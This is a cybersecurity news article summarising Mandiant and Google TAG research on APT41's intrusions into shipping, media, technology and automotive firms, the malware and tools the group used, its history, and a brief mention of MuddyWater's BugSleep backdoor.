Threat intelligence firm Mandiant in collaboration with Google’s Threat Analysis Group (TAG) observed a sustained campaign by the advanced persistent threat (APT) group APT41 targeting and compromising multiple organizations operating within the global shipping and logistics, media and entertainment, technology, and automotive sectors. Most organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. These hackers have infiltrated and maintained prolonged, unauthorized access to numerous victims’ networks since 2023, enabling them to extract sensitive data over an extended period.
At the time of the publication, neither Mandiant nor Google TAG have any indicators of these organizations being compromised by APT41, but it could potentially indicate an expanded scope of targeting.
“Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of ANTSWORD and BLUEBEAM web shells for persistence,” Mike Stokkel, Pierre Gerlings, Renato Fontana, Luis Rocha, Jared Wilson, Stephen Eckels, Jonathan Lepore, Mandiant researchers wrote in a blog post. “These web shells were identified on a Tomcat Apache Manager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download the DUSTPAN dropper to stealthily load BEACON. As the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper.”
They added that upon execution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic traces. “The decrypted payload was designed to establish communication channels with either APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have been successfully remediated to prevent further unauthorized access.”
Furthermore, APT41 leveraged SQLULDR2 to export data from Oracle Databases and used PINEGROVE to systematically exfiltrate large volumes of sensitive data from the compromised networks, transferring to OneDrive to enable exfiltration and subsequent analysis.
In May 2022, Mandiant identified that the persistent effort of a prolific Chinese state-sponsored espionage group, APT41, allowed them to compromise at least six U.S. state government networks by exploiting vulnerable Internet-facing web applications. The group has targeted a zero-day vulnerability in the USAHerds application and the zero-day vulnerability detected in the Log4j vulnerabilities. Mandiant has, however, not named the state governments that were affected.
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity that may be outside of state control. The group’s financially motivated intrusions have primarily targeted the video game industry, involving activities such as stealing source code and digital certificates, manipulating virtual currencies, and attempting to deploy ransomware. APT41 is unique among tracked China-based actors in that it utilizes non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions.
The group’s espionage operations have targeted sectors such as healthcare, high-tech, and telecommunications, and other areas of economic interest. APT41 has frequently used software supply chain compromises, where they inject malicious code into legitimate software updates. They also employ advanced techniques like the use of bootkits and compromised digital certificates. The group’s consistent targeting of the video game industry for personal gain is believed to have contributed to the development of tactics later used in their espionage operations.
Mandiant identified that an analysis of victim organizations within specific sectors reveals a notable geographic distribution. Nearly all targeted organizations operating in the shipping and logistics sector were located in Europe and the Middle East, with a single exception. In contrast, all affected organizations within the media and entertainment sector were located in Asia.
A significant portion of the victimized organizations within the shipping and logistics sector maintained operations across multiple continents, often as subsidiaries or affiliates of larger multinational corporations operating within the same industry.
Mandiant has detected reconnaissance activity directed towards similar organizations in other countries such as Singapore.
Earlier this week, CheckPoint researchers revealed that MuddyWater, an Iranian threat group linked to the Ministry of Intelligence and Security (MOIS) and active since at least 2017, has notably intensified its operations in Israel following the onset of the Israel-Hamas conflict last October. These campaigns have introduced a new, previously undocumented backdoor named BugSleep, specifically designed to target organizations in Israel.